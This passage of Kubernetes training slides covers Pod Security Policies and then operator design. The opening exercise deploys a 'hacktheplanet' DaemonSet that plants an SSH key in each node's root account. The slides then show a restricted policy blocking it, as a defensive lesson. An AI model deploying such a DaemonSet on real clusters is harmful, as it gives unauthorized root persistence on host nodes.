.exercise[ - Create the DaemonSet: ```bash kubectl create -f ~/container.training/k8s/hacktheplanet.yaml ``` - Check that the pods are running: ```bash kubectl get pods ``` - Confirm that the SSH key was added to the node's root account: ```bash sudo cat /root/.ssh/authorized_keys ``` ] .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Cleaning up - Before setting up our PodSecurityPolicies, clean up that namespace .exercise[ - Remove the DaemonSet: ```bash kubectl delete daemonset hacktheplanet ``` - Remove the Deployment: ```bash kubectl delete deployment web ``` ] .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Pod Security Policies in theory - To use PSPs, we need to activate their specific *admission controller* - That admission controller will intercept each pod creation attempt - It will look at: - *who/what* is creating the pod - which PodSecurityPolicies they can use - which PodSecurityPolicies can be used by the Pod's ServiceAccount - Then it will compare the Pod with each PodSecurityPolicy one by one - If a PodSecurityPolicy accepts all the parameters of the Pod, it is created - Otherwise, the Pod creation is denied and it won't even show up in `kubectl get pods` .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Pod Security Policies fine print - With RBAC, using a PSP corresponds to the verb `use` on the PSP (that makes sense, right?) - If no PSP is defined, no Pod can be created (even by cluster admins) - Pods that are already running are *not* affected - If we create a Pod directly, it can use a PSP to which *we* have access - If the Pod is created by e.g. a ReplicaSet or DaemonSet, it's different: - the ReplicaSet / DaemonSet controllers don't have access to *our* policies - therefore, we need to give access to the PSP to the Pod's ServiceAccount .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Pod Security Policies in practice - We are going to enable the PodSecurityPolicy admission controller - At that point, we won't be able to create any more pods (!) 
- Then we will create a couple of PodSecurityPolicies - ...And associated ClusterRoles (giving `use` access to the policies) - Then we will create RoleBindings to grant these roles to ServiceAccounts - We will verify that we can't run our "exploit" anymore .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Enabling Pod Security Policies - To enable Pod Security Policies, we need to enable their *admission plugin* - This is done by adding a flag to the API server - On clusters deployed with `kubeadm`, the control plane runs in static pods - These pods are defined in YAML files located in `/etc/kubernetes/manifests` - Kubelet watches this directory - Each time a file is added/removed there, kubelet creates/deletes the corresponding pod - Updating a file causes the pod to be deleted and recreated .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Updating the API server flags - Let's edit the manifest for the API server pod .exercise[ - Have a look at the static pods: ```bash ls -l /etc/kubernetes/manifests ``` - Edit the one corresponding to the API server: ```bash sudo vim /etc/kubernetes/manifests/kube-apiserver.yaml ``` ] .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Adding the PSP admission plugin - There should already be a line with `--enable-admission-plugins=...` - Let's add `PodSecurityPolicy` on that line .exercise[ - Locate the line with `--enable-admission-plugins=` - Add `PodSecurityPolicy` It should read: `--enable-admission-plugins=NodeRestriction,PodSecurityPolicy` - Save, quit ] .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Waiting for the API server to restart - The kubelet detects that the file was modified - It kills the API server pod, and starts a new one - During that time, the API server is unavailable .exercise[ - Wait until the API server is available again ] .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Check that the admission plugin is active - Normally, we can't create any Pod at this point .exercise[ - Try to create a Pod directly: ```bash kubectl run testpsp1 --image=nginx --restart=Never ``` - Try to create a Deployment: ```bash kubectl create deployment testpsp2 --image=nginx ``` - Look at existing resources: ```bash kubectl get all ``` ] We can get hints at what's happening by looking at the ReplicaSet and Events. 
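For example, the following commands should show events explaining why the Pods cannot be created (assuming the Deployment was named `testpsp2`, so that its ReplicaSet carries the label `app=testpsp2`):

```bash
kubectl describe replicaset --selector=app=testpsp2
kubectl get events --sort-by=.metadata.creationTimestamp | tail
```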
.debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Introducing our Pod Security Policies - We will create two policies: - privileged (allows everything) - restricted (blocks some unsafe mechanisms) - For each policy, we also need an associated ClusterRole granting *use* .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Creating our Pod Security Policies - We have a couple of files, each defining a PSP and associated ClusterRole: - k8s/psp-privileged.yaml: policy `privileged`, role `psp:privileged` - k8s/psp-restricted.yaml: policy `restricted`, role `psp:restricted` .exercise[ - Create both policies and their associated ClusterRoles: ```bash kubectl create -f ~/container.training/k8s/psp-restricted.yaml kubectl create -f ~/container.training/k8s/psp-privileged.yaml ``` ] - The privileged policy comes from [the Kubernetes documentation](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#example-policies) - The restricted policy is inspired by that same documentation page .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Check that we can create Pods again - We haven't bound the policy to any user yet - But `cluster-admin` can implicitly `use` all policies .exercise[ - Check that we can now create a Pod directly: ```bash kubectl run testpsp3 --image=nginx --restart=Never ``` - Create a Deployment as well: ```bash kubectl create deployment testpsp4 --image=nginx ``` - Confirm that the Deployment is *not* creating any Pods: ```bash kubectl get all ``` ] .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## What's going on? 
- We can create Pods directly (thanks to our root-like permissions) - The Pods corresponding to a Deployment are created by the ReplicaSet controller - The ReplicaSet controller does *not* have root-like permissions - We need to either: - grant permissions to the ReplicaSet controller *or* - grant permissions to our Pods' ServiceAccount - The first option would allow *anyone* to create pods - The second option will allow us to scope the permissions better .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Binding the restricted policy - Let's bind the role `psp:restricted` to ServiceAccount `green:default` (aka the default ServiceAccount in the green Namespace) - This will allow Pod creation in the green Namespace (because these Pods will be using that ServiceAccount automatically) .exercise[ - Create the following RoleBinding: ```bash kubectl create rolebinding psp:restricted \ --clusterrole=psp:restricted \ --serviceaccount=green:default ``` ] .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Trying it out - The Deployments that we created earlier will *eventually* recover (the ReplicaSet controller will retry to create Pods once in a while) - If we create a new Deployment now, it should work immediately .exercise[ - Create a simple Deployment: ```bash kubectl create deployment testpsp5 --image=nginx ``` - Look at the Pods that have been created: ```bash kubectl get all ``` ] .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Trying to hack the cluster - Let's create the same DaemonSet we used earlier .exercise[ - Create a hostile DaemonSet: ```bash kubectl create -f ~/container.training/k8s/hacktheplanet.yaml ``` - Look at the state of the namespace: ```bash kubectl get all ``` ] .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- class: extra-details ## What's in our restricted policy? - The restricted PSP is similar to the one provided in the docs, but: - it allows containers to run as root - it doesn't drop capabilities - Many containers run as root by default, and would require additional tweaks - Many containers use e.g. `chown`, which requires a specific capability (that's the case for the NGINX official image, for instance) - We still block: hostPath, privileged containers, and much more! .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- class: extra-details ## The case of static pods - If we list the pods in the `kube-system` namespace, `kube-apiserver` is missing - However, the API server is obviously running (otherwise, `kubectl get pods --namespace=kube-system` wouldn't work) - The API server Pod is created directly by kubelet (without going through the PSP admission plugin) - Then, kubelet creates a "mirror pod" representing that Pod in etcd - That "mirror pod" creation goes through the PSP admission plugin - And it gets blocked! - This can be fixed by binding `psp:privileged` to group `system:nodes` .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## .warning[Before moving on...] 
- Our cluster is currently broken (we can't create pods in namespaces kube-system, default, ...) - We need to either: - disable the PSP admission plugin - allow relevant users and groups to use PSPs - For instance, we could: - bind `psp:restricted` to the group `system:authenticated` - bind `psp:privileged` to the ServiceAccount `kube-system:default` .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Fixing the cluster - Let's disable the PSP admission plugin .exercise[ - Edit the Kubernetes API server static pod manifest - Remove the PSP admission plugin - This can be done with this one-liner: ```bash sudo sed -i s/,PodSecurityPolicy// /etc/kubernetes/manifests/kube-apiserver.yaml ``` ] ??? :EN:- Preventing privilege escalation with Pod Security Policies :FR:- Limiter les droits des conteneurs avec les *Pod Security Policies* .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/container-cranes.jpg)] --- name: toc-designing-an-operator class: title Designing an operator .nav[ [Previous section](#toc-pod-security-policies) | [Back to table of contents](#toc-module-5) | [Next section](#toc-) ] .debug[(automatically generated title slide)] --- # Designing an operator - Once we understand CRDs and operators, it's tempting to use them everywhere - Yes, we can do (almost) everything with operators ... - ... But *should we?* - Very often, the answer is **“no!”** - Operators are powerful, but significantly more complex than other solutions .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## When should we (not) use operators? - Operators are great if our app needs to react to cluster events (nodes or pods going down, and requiring extensive reconfiguration) - Operators *might* be helpful to encapsulate complexity (manipulate one single custom resource for an entire stack) - Operators are probably overkill if a Helm chart would suffice - That being said, if we really want to write an operator ... Read on! .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## What does it take to write an operator? - Writing a quick-and-dirty operator, or a POC/MVP, is easy - Writing a robust operator is hard - We will describe the general idea - We will identify some of the associated challenges - We will list a few tools that can help us .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Top-down vs. bottom-up
- Both approaches are possible - Let's see what they entail, and their respective pros and cons .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Top-down approach - Start with high-level design (see next slide) - Pros: - can yield a cleaner design that will be more robust - Cons: - must be able to anticipate all the events that might happen - the design will only be as good as what we anticipated - hard to anticipate if we don't have production experience .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## High-level design - What are we solving? (e.g.: geographic databases backed by PostGIS with Redis caches) - What are our use-cases, stories? (e.g.: adding/resizing caches and read replicas; load balancing queries) - What kinds of outages do we want to address? (e.g.: loss of individual node, pod, volume) - What are our *non-features*, the things we don't want to address? (e.g.: loss of datacenter/zone; differentiating between read and write queries;
cache invalidation; upgrading to newer major versions of Redis, PostGIS, PostgreSQL) .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Low-level design - What Custom Resource Definitions do we need? (one, many?) - How will we store configuration information? (part of the CRD spec fields, annotations, other?) - Do we need to store state? If so, where? - state that is small and doesn't change much can be stored via the Kubernetes API
(e.g.: leader information, configuration, credentials) - things that are big and/or change a lot should go elsewhere
(e.g.: metrics, bigger configuration file like GeoIP) .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- class: extra-details ## What can we store via the Kubernetes API? - The API server stores most Kubernetes resources in etcd - Etcd is designed for reliability, not for performance - If our storage needs exceed what etcd can offer, we need to use something else: - either directly - or by extending the API server
(for instance by using the aggregation layer, like [metrics server](https://github.com/kubernetes-incubator/metrics-server) does) .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Bottom-up approach - Start with existing Kubernetes resources (Deployment, Stateful Set...) - Run the system in production - Add scripts, automation, to facilitate day-to-day operations - Turn the scripts into an operator - Pros: simpler to get started; reflects actual use-cases - Cons: can result in convoluted designs requiring extensive refactoring .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## General idea - Our operator will watch its CRDs *and associated resources* - Drawing state diagrams and finite state automata helps a lot - It's OK if some transitions lead to a big catch-all "human intervention" - Over time, we will learn about new failure modes and add to these diagrams - It's OK to start with CRD creation / deletion and prevent any modification (that's the easy POC/MVP we were talking about) - *Presentation* and *validation* will help our users (more on that later) .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Challenges - Reacting to infrastructure disruption can seem hard at first - Kubernetes gives us a lot of primitives to help: - Pods and Persistent Volumes will *eventually* recover - Stateful Sets give us easy ways to "add N copies" of a thing - The real challenges come with configuration changes (i.e., what to do when our users update our CRDs) - Keep in mind that [some] of the [largest] cloud [outages] haven't been caused by [natural catastrophes], or even code bugs, but by configuration changes [some]: https://www.datacenterdynamics.com/news/gcp-outage-mainone-leaked-google-cloudflare-ip-addresses-china-telecom/ [largest]: https://aws.amazon.com/message/41926/ [outages]: https://aws.amazon.com/message/65648/ [natural catastrophes]: https://www.datacenterknowledge.com/amazon/aws-says-it-s-never-seen-whole-data-center-go-down .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Configuration changes - It is helpful to analyze and understand how Kubernetes controllers work: - watch resources for modifications - compare desired state (CRD) and current state - issue actions to converge state - Configuration changes will probably require *another* state diagram or FSA - Again, it's OK to have transitions labeled as "unsupported" (i.e. reject some modifications because we can't execute them)
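- To make that loop structure concrete, here is a deliberately naive sketch in shell (real operators use the watch API and a client library rather than polling `kubectl`; `mycustomresources` and the `managed-by` label are made-up names):

```bash
# Caricature of the controller pattern (for intuition only)
while true; do
  # 1. Watch: fetch the desired state expressed by our custom resources
  kubectl get mycustomresources --all-namespaces -o json > /tmp/desired.json
  # 2. Compare: fetch the current state of the resources we manage
  kubectl get deployments --all-namespaces --selector=managed-by=my-operator -o json > /tmp/current.json
  # 3. Converge: create/update/delete resources so that current state matches desired state
  #    (this is where the operator's actual logic would live)
  sleep 10
done
```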
.debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Tools - CoreOS / RedHat Operator Framework [GitHub](https://github.com/operator-framework) | [Blog](https://developers.redhat.com/blog/2018/12/18/introduction-to-the-kubernetes-operator-framework/) | [Intro talk](https://www.youtube.com/watch?v=8k_ayO1VRXE) | [Deep dive talk](https://www.youtube.com/watch?v=fu7ecA2rXmc) | [Simple example](https://medium.com/faun/writing-your-first-kubernetes-operator-8f3df4453234) - Zalando Kubernetes Operator Pythonic Framework (KOPF) [GitHub](https://github.com/zalando-incubator/kopf) | [Docs](https://kopf.readthedocs.io/) | [Step-by-step tutorial](https://kopf.readthedocs.io/en/stable/walkthrough/problem/) - Mesosphere Kubernetes Universal Declarative Operator (KUDO) [GitHub](https://github.com/kudobuilder/kudo) | [Blog](https://mesosphere.com/blog/announcing-maestro-a-declarative-no-code-approach-to-kubernetes-day-2-operators/) | [Docs](https://kudo.dev/) | [Zookeeper example](https://github.com/kudobuilder/frameworks/tree/master/repo/stable/zookeeper) .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Validation - By default, a CRD is "free form" (we can put pretty much anything we want in it) - When creating a CRD, we can provide an OpenAPI v3 schema ([Example](https://github.com/amaizfinance/redis-operator/blob/master/deploy/crds/k8s_v1alpha1_redis_crd.yaml#L34)) - The API server will then validate resources created/edited with this schema - If we need stronger validation, we can use a Validating Admission Webhook: - run an [admission webhook server](https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/#write-an-admission-webhook-server) to receive validation requests - register the webhook by creating a [ValidatingWebhookConfiguration](https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/#configure-admission-webhooks-on-the-fly) - each time the API server receives a request matching the configuration, the request is sent to our server for validation
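- For example, the registration could look like this (a minimal sketch; the API group, resource, and Service names are hypothetical):

```yaml
apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingWebhookConfiguration
metadata:
  name: validate-mycustomresources
webhooks:
- name: validate.mycustomresources.example.com
  admissionReviewVersions: ["v1"]
  sideEffects: None
  rules:
  - apiGroups: ["example.com"]
    apiVersions: ["v1alpha1"]
    operations: ["CREATE", "UPDATE"]
    resources: ["mycustomresources"]
  clientConfig:
    service:                       # our admission webhook server, running in the cluster
      namespace: default
      name: my-webhook-server
      path: /validate
    caBundle: LS0tLS1CRUdJTi...    # base64-encoded CA certificate (placeholder)
```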
.debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Presentation - By default, `kubectl get mycustomresource` won't display much information (just the name and age of each resource) - When creating a CRD, we can specify additional columns to print ([Example](https://github.com/amaizfinance/redis-operator/blob/master/deploy/crds/k8s_v1alpha1_redis_crd.yaml#L6), [Docs](https://kubernetes.io/docs/tasks/access-kubernetes-api/custom-resources/custom-resource-definitions/#additional-printer-columns)) - By default, `kubectl describe mycustomresource` will also be generic - `kubectl describe` can show events related to our custom resources (for that, we need to create Event resources, and fill the `involvedObject` field) - For scalable resources, we can define a `scale` sub-resource - This will enable the use of `kubectl scale` and other scaling-related operations .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## About scaling - It is possible to use the HPA (Horizontal Pod Autoscaler) with CRDs - But it is not always desirable - The HPA works very well for homogeneous, stateless workloads - For other workloads, your mileage may vary - Some systems can scale across multiple dimensions (for instance: increase number of replicas, or number of shards?) - If autoscaling is desired, the operator will have to make complex decisions (example: Zalando's Elasticsearch Operator ([Video](https://www.youtube.com/watch?v=lprE0J0kAq0))) .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Versioning - As our operator evolves over time, we may have to change the CRD (add, remove, change fields) - Like every other resource in Kubernetes, [custom resources are versioned](https://kubernetes.io/docs/tasks/access-kubernetes-api/custom-resources/custom-resource-definition-versioning/) - When creating a CRD, we need to specify a *list* of versions - Versions can be marked as `stored` and/or `served` .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Stored version - Exactly one version has to be marked as the `stored` version - As the name implies, it is the one that will be stored in etcd - Resources in storage are never converted automatically (we need to read and re-write them ourselves) - Yes, this means that we can have different versions in etcd at any time - Our code needs to handle all the versions that still exist in storage .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Served versions - By default, the Kubernetes API will serve resources "as-is" (using their stored version) - It will assume that all versions are compatible storage-wise (i.e.
that the spec and fields are compatible between versions) - We can provide [conversion webhooks](https://kubernetes.io/docs/tasks/access-kubernetes-api/custom-resources/custom-resource-definition-versioning/#webhook-conversion) to "translate" requests (the alternative is to upgrade all stored resources and stop serving old versions) .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Operator reliability - Remember that the operator itself must be resilient (e.g.: the node running it can fail) - Our operator must be able to restart and recover gracefully - Do not store state locally (unless we can reconstruct that state when we restart) - As indicated earlier, we can use the Kubernetes API to store data: - in the custom resources themselves - in other resources' annotations .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Beyond CRDs - CRDs cannot use custom storage (e.g. for time series data) - CRDs cannot support arbitrary subresources (like logs or exec for Pods) - CRDs cannot support protobuf (for faster, more efficient communication) - If we need these things, we can use the [aggregation layer](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/apiserver-aggregation/) instead - The aggregation layer proxies all requests below a specific path to another server (this is used e.g. by the metrics server) - [This documentation page](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/custom-resources/#choosing-a-method-for-adding-custom-resources) compares the features of CRDs and API aggregation ??? :EN:- Guidelines to design our own operators :FR:- Comment concevoir nos propres opérateurs .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)]